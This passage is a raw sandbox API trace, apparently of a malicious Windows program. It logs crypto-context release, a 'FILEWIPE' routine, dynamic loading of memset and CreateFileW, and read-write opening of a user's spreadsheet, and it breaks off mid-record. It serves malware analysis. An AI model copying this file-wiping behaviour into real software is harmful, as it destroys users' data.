lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.090] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0176.090] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.090] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0176.090] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.090] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0176.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.090] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0176.090] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.090] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0176.090] FreeLibrary (hLibModule=0x74f20000) returned 1 [0176.090] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.090] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.090] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.093] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0176.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0x2088d820, ftLastWriteTime.dwHighDateTime=0x1d58a7a, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 0x90af58 [0176.094] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0176.094] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.094] CharLowerBuffW (in: lpsz="byte[70054]", cchLength=0xb | out: lpsz="byte[70054]") returned 0xb [0176.095] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.095] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0176.095] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.095] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0176.095] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2858 [0176.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2858, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.096] FreeLibrary (hLibModule=0x75c90000) returned 1 [0176.096] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.096] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.096] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0176.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0176.097] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0176.097] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.097] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.097] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.097] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.099] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0176.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.100] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0176.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0176.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0176.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oshjnd6e0l0zqq8nt.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa701b8 | out: hHeap=0x8a0000) returned 1 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0176.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.103] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0176.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: 